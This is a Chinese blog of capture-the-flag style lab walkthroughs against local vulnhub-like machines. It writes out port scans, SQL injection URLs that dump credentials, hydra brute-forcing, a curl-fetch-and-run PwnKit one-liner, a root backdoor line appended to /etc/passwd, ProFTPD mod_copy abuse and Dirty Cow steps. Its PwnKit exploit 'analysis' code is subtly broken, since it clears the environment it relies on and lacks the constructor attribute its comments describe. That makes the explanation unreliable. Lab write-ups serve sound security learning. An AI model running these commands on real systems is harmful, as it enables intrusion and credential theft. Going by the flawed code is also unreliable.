welcome to my blog~!

this is an example introduction. feel free to customize it!

add more lines to make it personal.

things i love:

coding
cats
coffee

tags:

@ 01/01/0001

如果扫描不到主机https://blog.csdn.net/Czheisenberg/article/details/122897376

端口扫描

nmap -sn --min-rate 10000 192.160.30.0/24
nmap --min-rate 10000 -p- 192.168.30.139
nmap --min-rate 10000 -sT -sV -sC -O -p22,8080,8081 -oA scan/detail 192.168.30.139
nmap --min-rate 10000 -sU -p- -oA scan/udp 192.168.30.139
nmap -script=vuln 192.168.30.139

服务探测

8080端口说网站正在创建，以后再来。

/robots.txt无有效信息。

输入无效url时，页面提示。泄露目录地址mercuryfacts/

http://192.168.30.139:8080/mercuryfacts/

目录爆破

gobuster dir -u http://192.168.30.139:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

mercuryfacts探测

一张图片：http://192.168.30.139:8080/static/mercury_facts/mercury_1.jpg

两个🔗:

http://192.168.30.139:8080/mercuryfacts/1
http://192.168.30.139:8080/mercuryfacts/todo

对图片file、exiftool、binwalk3查看类型、信息、绑定信息。并无特殊内容。

注意到url链接中存在数字，尝试更改。测了一下到8.

# 1
Fact id: 1. (('Mercury does not have any moons or rings.',),)
事实编号：1. （水星没有任何卫星或环。），)
# 2
Fact id: 2. (('Mercury is the smallest planet.',),)
事实 ID：2. （'水星是太阳系中最小的行星。',）
# 3
Fact id: 3. (('Mercury is the closest planet to the Sun.',),)
事实 ID：3. (('水星是距离太阳最近的行星。'),)
#4
Fact id: 4. (('Your weight on Mercury would be 38% of your weight on Earth.',),)
事实编号：4. （'在 Mercury 上的体重将是你在地球上的体重的 38%。',）
#5
Fact id: 5. (('A day on the surface of Mercury lasts 176 Earth days.',),)
事实编号：5. （'水星表面的一天相当于地球上的 176 天。',）
#6
Fact id: 6. (('A year on Mercury takes 88 Earth days.',),)
事实编号：6. （“水星上的一年相当于 88 个地球日。”，）
#7
Fact id: 7. (("It's not known who discovered Mercury.",),)
事实编号：7. （（“无人知晓是谁发现了水星。”），）
# 8
Fact id: 8. (('A year on Mercury is just 88 days long.',),)
事实编号：8. （“水星上的一年只有 88 天。”，）

…

加上前面信息，可以确定是django开发的网页。

看一下有没有sql注入。

http://192.168.30.139:8080/mercuryfacts/1 order by 1

回显位置为1，位于最后这个位置。

http://192.168.30.139:8080/mercuryfacts/1 union select table_name from information_schema.tables where table_schema=database()

(‘facts’,), (‘users’,)查看users表。

http://192.168.30.139:8080/mercuryfacts/1 union select column_name from information_schema.columns where table_name='users'

(‘id’,), (‘password’,), (‘username’,)

http://192.168.30.139:8080/mercuryfacts/1 union select group_concat(username,':',password) from users

拿到四组账号。

john:johnny1987

laura:lovemykids111

sam:lovemybeer111

webmaster:mercuryisthesizeof0.056Earths

SSH登录

创建凭据文件creds.txt。

john:johnny1987
laura:lovemykids111
sam:lovemybeer111
webmaster:mercuryisthesizeof0.056Earths

使用hydra测试哪些可以登录，

hydra -C creds.txt ssh://192.168.30.139

-L 和 -P：这是最常用的方法，用于用户名列表和密码列表的 全排列组合。比如，如果你有10个用户名和100个密码，Hydra 会尝试 1000 次组合。

-C：这是更精确的方法，用于测试 特定的用户名和密码组合。它只会尝试文件中给定的每一行，不会进行全排列。

只有一个成功。

webmaster:mercuryisthesizeof0.056Earths

登录ssh。

ssh webmaster@192.168.30.139
mercuryisthesizeof0.056Earths

提权

sudo -l #无
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

看到了pkexec。https://gtfobins.github.io/gtfobins/pkexec/

或许可以直接提权。

sudo pkexec /bin/sh

webmaster@mercury:~$ sudo pkexec /bin/sh [sudo] password for webmaster: webmaster is not in the sudoers file. This incident will be reported.

失败。

pkexec 是 Linux 系统中 PolicyKit（简称 Polkit）框架的一部分。它的作用类似于 sudo，允许一个用户以另一个用户的身份（通常是 root）来执行命令。但与 sudo 不同的是，pkexec 的权限授予是基于细粒度的策略（policy）而不是 /etc/sudoers 文件。

CVE-2021-4034 的独立漏洞利用 - Pkexec 本地提权

https://github.com/ly4k/PwnKit

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

惊掉大牙，一个命令直接成功。👍

Flag

脚本分析

来都来了，看一下如何实现的提权。思路非常巧妙，它不是简单的命令注入。

而是利用程序内部逻辑错误的链式攻击。

在传统的提权攻击中，我们通常寻找一个 SUID-root 的程序（如 find 或 vim），然后利用它的不安全功能来执行一个 shell。而 PwnKit 漏洞的思路是：我们不直接利用 pkexec 的任何功能，而是利用它在执行前的初始化阶段的一个逻辑缺陷，欺骗它去运行我们的恶意代码。

简单来说，攻击者想让 pkexec 在启动时，把本该读取系统配置文件的地方，换成读取攻击者自己的恶意文件。由于 pkexec 是以 root 权限启动的，它执行攻击者的恶意文件时，也会以 root 权限来运行。

漏洞原理：环境变量劫持与内存损坏

这个漏洞的核心原理是 pkexec 在处理命令行参数时的一个内存越界读（out-of-bounds read）。这导致它错误地将环境变量当作了命令行参数来处理。

正常情况下的 pkexec 启动流程：

pkexec 检查命令行参数 (argv)。
它会清除并重新设置一些危险的环境变量，比如 PATH。

漏洞利用过程中的 pkexec 启动流程：

命令行参数为空：攻击者通过 execve 系统调用，以一个空 argv 列表来启动 pkexec。pkexec 的代码在处理 argv 时存在一个逻辑缺陷，当 argv 为空时，它会错误地从内存中读取紧挨着 argv 的环境变量，并将其误认为是命令行参数。
环境变量被当做参数：当 pkexec 尝试清理环境变量时，它会遍历它误读的环境变量列表。它会寻找并清除 GCONV_PATH 和 SHELL 等环境变量，但由于它是从 argv 列表中读取的，它实际上并没有清除它们。
gconv_path 劫持：pkexec 在启动时需要找到一些系统路径来设置其安全环境。它会尝试找到 pkexec 的可执行文件路径，但由于前面提到的内存越界问题，这一步会失败。当它失败后，它会退而求其次，寻找一个名为 gconv-modules 的文件来设置字符集转换。它会使用环境变量 GCONV_PATH 来寻找这个文件。
加载恶意共享库：攻击者提前设置了两个环境变量：
- GCONV_PATH=/tmp/pwn：指向一个攻击者可控的目录。
- LC_MESSAGES=C.UTF-8：一个特定的环境变量，用于触发 gconv 库的加载。
攻击者在 /tmp/pwn 目录下创建了一个伪造的 gconv-modules 文件，该文件指向一个恶意的 .so 共享库文件，比如 /tmp/pwn/exploit.so。
提权成功：当 pkexec 尝试加载 gconv-modules 时，它会找到攻击者伪造的文件，然后加载并执行 exploit.so 共享库。由于 pkexec 此时仍然以 root 权限运行，exploit.so 中的代码也会以 root 权限执行，从而为攻击者弹出一个 root shell。

漏洞利用代码分析

一个典型的 PwnKit 漏洞利用代码通常包含两个主要部分：主程序（用于设置环境）和恶意共享库（用于执行 payload）。

1. 主程序 (exploit.c)

这个文件负责设置环境变量并执行 pkexec。

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    // 1. 设置 GCONV_PATH，指向恶意目录
    // 2. 设置其他必要的环境变量
    setenv("GCONV_PATH", ".", 1);
    setenv("LC_MESSAGES", "C.UTF-8", 1);
    
    // 3. 构建一个空命令行参数列表
    char *argv[] = { NULL };
    
    // 4. 使用 execve 启动 pkexec
    // 关键：第一个参数是可执行文件路径，第二个参数是命令行参数（我们传 NULL）
    execve("/usr/bin/pkexec", argv, NULL);
    
    return 0;
}

分析：

setenv()：这是设置环境变量的关键函数。GCONV_PATH 被设置为 .，意味着当前目录，这样在后续编译时，我们的恶意文件就在当前目录。LC_MESSAGES 被设置为 C.UTF-8，这是为了触发 gconv-modules 的加载。
char \*argv[] = { NULL };：这就是漏洞利用的核心。它创建了一个空的命令行参数列表。
execve("/usr/bin/pkexec", argv, NULL);：这个函数会用我们构造的空参数列表来启动 pkexec，从而触发漏洞。

2. 恶意共享库 (payload.c)

这个文件会被编译成一个 .so 共享库，它包含实际的提权代码。

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>

// __attribute__((constructor)) 是关键
// 它确保这个函数在库被加载时自动运行
void gconv() {
    // 检查是否获得了 root 权限
    // 0 是 root 用户的 UID
    if (geteuid() == 0) {
        setuid(0);
        setgid(0);
        // 执行一个 root shell
        // -p 参数是为了保留特权
        execl("/bin/sh", "sh", "-p", NULL);
    }
}

分析：

__attribute__((constructor))：这是一个 GCC 的特性，它告诉编译器，gconv() 函数应该在程序加载这个共享库时自动执行，而不是等待被调用。
if (geteuid() == 0)：这是一个安全检查，确保代码只在以 root 权限运行时才执行。
setuid(0) 和 setgid(0)：这些函数将当前进程的实际用户 ID 和组 ID 设置为 root，以确保提权完全成功。
execl("/bin/sh", "sh", "-p", NULL)：这会用 root 权限启动一个新的 shell。-p 参数是用来告诉 shell 保留其有效的用户 ID，防止它自动降权。

结论： 攻击者通过 exploit.c 触发 pkexec 的漏洞，导致 pkexec 错误地加载了 payload.so。payload.so 中的 gconv() 函数在加载时自动运行，并以 pkexec 的权限（也就是 root）执行，最终弹出了一个 root shell。

tags:

@ 01/01/0001

扫描不到ip靶场网卡问题

开机狂按shift。看到这个窗口按e，开始编辑。

找到ro改为rw signie init=/bin/bash，然后ctrl+x。

ip a看一下网卡名字。

然后找/etc/network/interfaces文件或etc/netplan下的文件。

/etc/network/interfaces

传统方法：主要用于 Debian 和 Ubuntu（16.04 及更早版本）
后端：直接使用 ifupdown 工具链
配置格式：INI 风格的配置文件

/etc/netplan

现代方法：Ubuntu 18.04+ 默认使用，逐渐在其他发行版推广
后端：支持多种网络管理器（NetworkManager、systemd-networkd）
配置格式：YAML 格式

这里在etc/netplan目录下，修改网卡名字为ens33就可以了。

端口扫描

nmap --min-rate 10000 -sTVC -p- -oA scan/detail 192.168.30.149
nmap --min-rate 10000 -sUVC -p- -oA scan/udp 192.168.30.149

22和80。

80是apache的默认页。

目录扫描

简单扫描。

dirb http://192.168.30.149

专项扫描。

dirb http://192.168.30.149 /usr/share/dirb/wordlists/vulns/apache.txt

拓展扫描。

gobuster dir -u http://192.168.30.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

查看remb.txt和remb2.txt文件。

只有remb.txt还存在。

first_stage:flagitifyoucan1234

看格式是个账户：密码。

信息收集

当前交互性不好。

…

tags:

@ 01/01/0001

端口扫描

nmap --min-rate 10000 -sn 192.168.30.0/24
nmap --min-rate 10000 -p- 192.168.30.141
nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3306,8080,8081 -oA scan/detail  192.168.30.141
nmap --min-rate 10000 -sU -p- -oA scan/udp 192.168.30.141
nmap --min-rate 10000 -script=vuln -p22,80,3306,8080 -oA scan/vuln 192.168.30.141

服务探测

80端口。是个webpy2框架写的http服务。但是登录注册功能都无效。应该是个静态页面。

看8080端口。

漏洞扫描结果中发现有wordpress服务。不过/wordpress和/wordpress/wp-login.php都因为数据库问题无法访问。

不过可以访问的目录有其他目录下没有价值内容。除了/dubug。

就是个webshell功能。

信息收集

可登录用户。

root和brexit。

这条 sudo -l 命令的输出表明，www-data 用户可以在 localhost 上以 brexit 用户的身份，执行 /bin/bash 命令，并且不需要输入密码。

sudo -u brexit /bin/bash

现在我们先拿到brexit用户。升级终端

python -c "import pty;pty.spawn('/bin/bash')"
#设置终端类型以支持 vim、less 等程序的正常显示。
export TERM=xterm

…

继续信息收集。这个还挺多，看到有pkexec，就试了试CVE-2021-4034那个，没成功。

find / -perm -u=s -type f 2>/dev/null

p0wny@shell:…/html/debug# find / -perm -u=s -type f 2>/dev/null
/snap/core/17247/bin/mount
/snap/core/17247/bin/ping
/snap/core/17247/bin/ping6
/snap/core/17247/bin/su
/snap/core/17247/bin/umount
/snap/core/17247/usr/bin/chfn
/snap/core/17247/usr/bin/chsh
/snap/core/17247/usr/bin/gpasswd
/snap/core/17247/usr/bin/newgrp
/snap/core/17247/usr/bin/passwd
/snap/core/17247/usr/bin/sudo
/snap/core/17247/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/17247/usr/lib/openssh/ssh-keysign
/snap/core/17247/usr/lib/snapd/snap-confine
/snap/core/17247/usr/sbin/pppd
/bin/su
/bin/ping
/bin/mount
/bin/fusermount
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/pkexec

先看看其他的。

看/html目录下。除了shell目录和wordpress目录，其他的都看了。而shell目录下也没有信息。

看wordpress内容。

有root.txt不过确实看不了内容。

.htaccess 文件，它是 Apache Web 服务器的一个配置文件，允许你在网站的特定目录下设置规则，而不需要修改主服务器配置。

WordPress 使用这个文件来管理其永久链接（Permalinks），也就是我们看到的简洁、友好的 URL 格式（例如 你的网站.com/关于我们），而不是 你的网站.com/?p=123 这样的 URL。

# BEGIN WordPress

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /wordpress/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /wordpress/index.php [L]
</IfModule>

# END WordPress

`.htaccess` 文件内容详解

这段代码的核心功能就是，把所有不指向真实文件或目录的请求，都交给 index.php 来处理。

# BEGIN WordPress 和 # END WordPress: 这些是注释，标记了 WordPress 规则的开始和结束。WordPress 在管理后台中修改永久链接时，会自动更新这些行之间的内容。
<IfModule mod_rewrite.c>: 这是一个条件语句。它确保只有当 Apache 服务器加载了 mod_rewrite 模块（URL 重写模块）时，内部的规则才会被执行。这是一个很好的编程习惯，可以避免在服务器不支持该模块时出错。
RewriteEngine On: 开启 URL 重写引擎。这是后面所有重写规则生效的前提。
RewriteBase /wordpress/: 设置 URL 重写的基础目录。这意味着接下来的所有规则都将从 /wordpress/ 这个子目录开始计算。
RewriteRule ^index\.php$ - [L]: 这是一个非常重要的规则，用来防止无限循环。它的作用是：如果请求的 URL 正好是 index.php，那么就停止执行任何其他重写规则。
RewriteCond %{REQUEST_FILENAME} !-f: 这是一个条件。RewriteCond 总是应用于紧随其后的 RewriteRule。这条规则检查请求的文件名是否不是一个真实的文件。如果请求的 URL 对应的文件在服务器上不存在，则此条件为真。
RewriteCond %{REQUEST_FILENAME} !-d: 这是另一个条件。它检查请求的文件名是否不是一个真实的目录。如果请求的 URL 对应的目录在服务器上不存在，则此条件为真。
RewriteRule . /wordpress/index.php [L]: 这是核心重写规则。
- \.：匹配所有字符。
- 这条规则的作用是：如果前面的两个条件都为真（即请求的 URL 既不是真实文件，也不是真实目录），那么就把这个请求内部重定向到 /wordpress/index.php。
- [L]：表示这是最后一个规则，如果匹配成功，就停止处理。

index.php

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

WordPress 的核心入口点，唯一作用是加载 wp-blog-header.php。

wp-blog-header.php

<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once( dirname( __FILE__ ) . '/wp-load.php' );

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once( ABSPATH . WPINC . '/template-loader.php' );

}

require_once( dirname( __FILE__ ) . '/wp-load.php' );: 加载最重要的核心文件。这个文件负责加载所有的 WordPress 核心库、连接数据库、并加载插件和主题的功能。

wp-load.php 是 WordPress 漏洞利用中一个非常关键的文件。

它的作用: wp-load.php 负责初始化整个 WordPress 环境，包括数据库连接、插件和主题的加载。如果你能找到一个文件包含漏洞（LFI），并让它包含 wp-load.php，你就能利用 WordPress 的内部函数，而不是从头开始。
典型的文件包含漏洞：如果你能找到一个像 load.php?file=... 这样的文件包含点，你可以尝试让它包含 wp-load.php，然后利用 WordPress 的功能来执行命令或获取敏感信息。

发现一个wp-comments-post.php。像是内容提交，极有可能有命令注入。

提权

转换思路。

也是polkit的。

还是尝试CVE-2021-4034。这次是其他的。

https://github.com/berdav/CVE-2021-4034

git clone https://github.com/berdav/CVE-2021-4034

make需要root权限安装，那就现在kali编译然后传入目标。

提升这种版本问题就需要静态编译了。

不过这里涉及多个。

切换思路

用户家目录下。.viminfo中记录了用户写入了哪些文件。

查一下可写文件。

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null

果然

最后一个就是/etc/passwd，居然有写入权限。

/etc/passwd提权

看一下/etc/passwd里的格式。

示例

root:x:0:0:root:/root:/bin/bash

root 是用户名。
x 表示密码已被加密存储在 /etc/shadow 文件中。
0 是用户ID（UID）。
0 是组ID（GID）。
root 是用户描述。
/root 是家目录。
/bin/bash 是默认Shell。

我们可以直接在/etc/passwd中追加一个账号作为root账号即可。也可以直接修改root的密码，此处我们就追加一条信息，账号是woleyi，密码设置为woleyi，用openssl生成对应的hash如下：

openssl passwd -1 woleyi >woleyi.hash

$1$R8n7fjKI$ZBEp65e18cOd2ct7quYSK.

整理格式

woleyi:$1$R8n7fjKI$ZBEp65e18cOd2ct7quYSK.:0:0:woleyi passwd:/woleyi:/bin/bash

echo 'woleyi:$1$R8n7fjKI$ZBEp65e18cOd2ct7quYSK.:0:0:woleyi passwd:/woleyi:/bin/bash'>>/etc/passwd
cat /etc/passwd

写入成功。登录账号。

Password:brexit@misdirection:~$ su woleyi
su woleyi
Password: woleyi

成功。

Over！

tags:

@ 01/01/0001

端口扫描

21和2121端口ftp服务存在匿名登录。anonymous

服务探测

80端口下，一个外部链接，很简单。目录爆破下。

那个一个凭据rootrootl。

SSH 服务探测

不能直接使用账号密码登录。

FTP 服务探测

anonymous:anonymous

ftp 192.168.30.146

2121端口。

ftp 192.168.30.146

服务器在被动模式下打开的随机数据端口被防火墙或路由规则阻止了。

回到21端口。

发现一个pub目录，下载到本地。如果是单个文件可以用get，但是目录的话可以用megt。

mget下载

ftp登录后。看一下有哪些命令。

help

mget pub/*

wget下载目录文件

# wget
wget -r --ftp-user=用户名 --ftp-password=密码 ftp://FTP服务器地址/远程目录名/

-r (or --recursive): 启用递归下载，这是下载整个目录的关键。
--no-parent: 确保它不会爬到父目录中去，只下载指定目录及其子目录的内容。

wget -r --no-parent --ftp-user=anonymous --ftp-password=anonymous ftp://192.168.30.146/pub/

lftp命令下载

lftp 是一个功能更强大的 FTP 客户端，它提供了 mirror 命令，可以轻松实现递归下载。如果您的系统安装了 lftp，这是非常高效的方法。

lftp -u 用户名,密码 FTP服务器地址

连接到 FTP 服务器：

Bash
```
 …
```
```
lftp -u 用户名,密码 FTP服务器地址
```
(或者先输入 lftp FTP服务器地址，再用 user 用户名密码 登录)

执行递归下载（镜像）：

Bash

mirror /远程目录名 /本地目标路径

示例：

Bash

# lftp 命令行
lftp -u myuser,mypass 192.168.1.100
lftp 192.168.1.100:~> mirror /remote/files /home/localuser/downloads/
lftp 192.168.1.100:~> bye

mirror 命令会自动下载远程目录下的所有文件和子目录，并保持本地目录结构与远程一致。

查看目录信息。

tree -a 192.168.30.146

smb服务

smb服务探测

使用nmap探测

nmap -p 445 -sV 192.168.30.146

确定是Samba版本。

Nmap 自带许多用于 SMB 枚举的脚本，无需凭据即可运行：

NSE 脚本	目的	示例命令
`smb-enum-shares`	枚举共享。尝试列出目标系统上的所有共享目录，包括匿名共享。	`nmap -p 445 --script smb-enum-shares <目标IP>`
`smb-enum-users`	枚举用户。尝试列出目标系统上的用户账号，但很多现代 Windows 系统默认禁用此功能。	`nmap -p 445 --script smb-enum-users <目标IP>`
`smb-os-discovery`	OS 发现。获取关于操作系统的详细信息，包括域名/工作组、计算机名称、系统时间等。	`nmap -p 445 --script smb-os-discovery <目标IP>`
`smb-security-mode`	安全模式。检查 SMB 签名是否开启，并报告 SMB 版本。	`nmap -p 445 --script smb-security-mode <目标IP>`

# 枚举共享目录
nmap --min-rate 10000 -p 445 --script smb-enum-shares 192.168.30.146 -oA scan/smbshares
# 枚举用户
nmap --min-rate 10000 -p 445 --script smb-enum-users 192.168.30.146 -oA scan/smbusers
# OS发现
nmap --min-rate 10000 -p 445 --script smb-os-discovery 192.168.30.146 -oA scan/smbos
# 安全模式
nmap --min-rate 10000 -p 445 --script smb-security-mode 192.168.30.146 -oA scan/smbsecu

使用smbclient探测

smbclient -L 192.168.30.146 -N
# -L: 列出服务 (List)
# -N: 不使用密码 (No password)

这是目标服务器上公开或至少对匿名用户可见的共享目录（Sharename）和服务的列表：

Sharename	Type	Comment	解释
`print$`	Disk	Printer Drivers	用于存储打印机驱动程序的管理共享，通常是默认共享。
`smbdata`	Disk	smbdata	一个普通的文件共享。这很可能包含用户数据或系统文件，是渗透测试中重点关注的目标。
`smbuser`	Disk	smbuser	另一个普通的文件共享。这也可能是包含有用信息的目标。
`IPC$`	IPC	IPC Service (Samba 4.9.1)	进程间通信 (IPC) 共享。这是一个默认的隐藏管理共享，用于远程管理和程序通信。它同时暴露了服务器正在运行 Samba 4.9.1 版本。

使用enum4linux (专用枚举工具)

enum4linux 是一个自动化脚本，专门用于在 Linux/Kali 上执行多种 SMB 和 NetBIOS 枚举技术。

核心功能

这个工具整合了多种技术来获取以下信息：

用户列表
组列表
共享列表
密码策略信息

enum4linux 192.168.30.146

探测流程总结

nmap --min-rate 10000 -p 445 --script smb-os-discovery 192.168.30.146 -oA scan/smbos
nmap --min-rate 10000 -p 445 --script smb-security-mode 192.168.30.146 -oA scan/smbsecu
# 列出共享目录
smbclient -L 192.168.30.146 -N
# 枚举用户
nmap --min-rate 10000 -p 445 --script smb-enum-users 192.168.30.146 -oA scan/smbusers
# 连接服务

smb服务连接

使用smbclient

smbclient //服务器IP或名称/共享名 -U 用户名
# 需要密码
smbclient //192.168.30.146/myshare -U myuser
# 匿名访问
smbclient //192.168.30.146/myshare -N # 或 -U %

匿名用户虽然可以登录，但是无权访问。

使用smbuser（该用户名在nmap的用户枚举脚本中发现）。

smbclient //192.168.30.146/smbdata -U smbuser
smbclient //192.168.30.146/smbdata -N

需要密码，尝试上面发现的凭据rootrootl。失败。

那么smb服务这一块就剩下匿名登录可以访问的smbdata目录了。

查看目录详细内容。

exit
# 退出smb服务到本地
mkdir smb
cd smb
# 在当前目录进入smb服务
smbclient //192.168.30.146 -N 

# mget所有文件，mget只能下载文件，会逃过目录
mget *
# 每个都yes

使用mount挂载

使用mount挂载则可以看到目录和文件。但是挂载失败，因为用户身份。

# 创建挂载点
mkdir smb_mnt
# 匿名身份
sudo mount -t cifs //192.168.30.146/smbdata ./smb_mnt -o username=guest,password=
# 卸载挂载点
sudo umount /mnt/smb_share

回到我们一个个下载的目录下。

暂时没发现有用信息，ssh_config文件中可以看到确实只能通过ssh证书登录。

撞库

燃尽了，这里整理账号密码。

root
smbuser

rootrootl

除了ssh和nfs和smb，就只有ftp了。

hydra -L user.txt -P password.txt ftp://192.168.30.146

燃尽了。失败了。我不理解。原来是密码输错了。1``l。

rootroot1

hydra -L user.txt -P password.txt ftp://192.168.30.146
hydra -L user.txt -P password.txt ftp://192.168.30.146 -s 2121

两个ftp端口都成功。

登录ftp

ftp 192.168.30.146

连接的是smbuser用户的家目录位置。

登录2121端口的ftp服务

ftp 192.168.30.146

使用的ProFTPD 1.3.5服务。ProFTPD 1.3.5 版本存在一个著名的漏洞：mod_copy 模块的任意文件复制和远程命令执行漏洞。

SSH密钥登录

上传公钥

根据ssh_config中的配置。

我们只需在该用户家目录下创建.ssh/authorized_keys路径就可以。

先在kali生成密钥对。

在现代系统中，Ed25519 是推荐的密钥类型，因为它更快、更安全且密钥更短。如果兼容性是首要考虑，则使用 RSA。

密钥类型	推荐命令	密钥大小/效率
Ed25519 (推荐)	`ssh-keygen -t ed25519`	256 位，非常快，安全性高。
RSA (通用)	`ssh-keygen -t rsa -b 4096`	4096 位（推荐长度），兼容性最好。

ssh-keygen -t ed25519 -C "kali-smbuser" -f ./authorized_keys

回车回车。

一个私钥，一个公钥。我们把公钥上传。

ftp 192.168.30.146

使用私钥登录

ssh -i authorized_keys smbuser@192.168.30.146

登录成功。

提权

非常典型的。

polkit的PwnKit提权

cve-2021-4034

https://github.com/ly4k/PwnKit

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

没成功。

ProFTPD 1.3.5 mod_copy漏洞

searchploit ProFTPD

上面几个用来打点。我们看一下这个复制漏洞教程。

Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
Connected to 80.150.216.115.                                                                                                                                                  [0/727]
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------

He provides another, scarier example:

------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php

test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied
-----------------------

test.php contains contain correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter

Source: http://bugs.proftpd.org/show_bug.cgi?id=4169

nc 192.168.30.146 2121
site cpfr .ssh/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys

这组命令利用了标准的 FTP 协议和您之前提到过的 ProFTPD mod_copy 漏洞所引入的扩展命令（SITE CPFR 和 SITE CPTO）的思想，来在服务器内部复制文件。

命令	协议/工具	作用
`nc 192.168.30.146 2121`	Netcat (nc)	建立连接：使用 Netcat 工具连接到目标 IP `192.168.30.146` 的 `2121` 端口。如果 `2121` 端口上运行的是 FTP 服务，那么您已经建立了原始的 TCP 连接，等待输入 FTP 命令。
`site cpfr .ssh/authorized_keys`	FTP 扩展 (`mod_copy`)	复制源文件 (Copy From)：通知 FTP 服务器，您希望将位于服务器文件系统上的文件 `.ssh/authorized_keys` 作为复制操作的源文件。
`site cpto /home/smbuser/.ssh/authorized_keys`	FTP 扩展 (`mod_copy`)	复制目标文件 (Copy To)：通知 FTP 服务器，您希望将源文件复制到目标位置 `/home/smbuser/.ssh/authorized_keys`。

重新登录ssh。

ssh smbdata@192.168.30.146
su root

到这里才发现，原来提权直接。

su root
rootroot1就可以了

内核提权

uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

这个内核版本 3.10.0-229.el7.x86_64 是非常老旧的，存在着多个已知的、可利用的内核漏洞，可以实现本地提权到 root。

优先级最高的内核提权漏洞

1. 脏牛 (Dirty Cow) - CVE-2016-5195

漏洞类型： 竞争条件漏洞（Race Condition），存在于 Linux 内核的内存子系统中的写时复制（Copy-on-Write, COW）机制。

影响范围： Linux Kernel >= 2.6.22 版本（2007 年）到 2016 年 10 月底。您的 3.10.0-229.el7.x86_64 肯定在这个范围内。

利用难度： 低到中等。已公开的 Exploit 非常稳定可靠。

效果： 允许本地低权限用户修改只有 root 用户可写的文件。典型的利用方式是修改 /etc/passwd 文件，插入一个具有 root 权限的后门用户，或修改一个现有用户的密码。

如何利用 (简要步骤)：

上传 Exploit： 将 Dirty Cow 的 C 语言 Exploit 代码上传到目标机器（如果目标机器可以访问互联网，也可以直接用 wget）。

编译： 在目标机器上用 gcc 编译 Exploit。

Bash
gcc -pthread dirty.c -o dirty -lcrypt
运行： 运行 Exploit 来修改一个文件（例如 /etc/passwd）。

目标： 将一个新的用户条目（例如用户名为 firefart，密码为 firefart）写入 /etc/passwd。

执行后： 使用新创建的账户和密码即可 su 或 ssh 登录为 root。

2. PwnKit (Polkit Local Privilege Escalation) - CVE-2021-4034

漏洞类型： 内存损坏漏洞，存在于 Polkit 的 pkexec 程序中。

影响范围： 这是一个影响几乎所有主要 Linux 发行版超过 12 年的漏洞。

与内核的关系： 虽然 PwnKit 是一个用户空间程序漏洞 (SUID 二进制文件 pkexec)，但由于它影响非常广泛，您的系统很可能受到影响。

利用难度： 低。Exploit 稳定可靠。

效果： 允许任何非特权本地用户通过执行一个简单的命令立即获得完整的 root 权限。

如何检查和利用 (简要步骤)：

检查 pkexec： 您已经在列表中提到它：/usr/bin/pkexec。

上传 Exploit： 将 PwnKit 的 C 语言 Exploit 代码上传到目标机器。

编译并运行：

Bash
gcc pwnkit.c -o pwnkit
./pwnkit
如果 Exploit 成功，您将获得一个 root Shell。

其他可能适用的漏洞

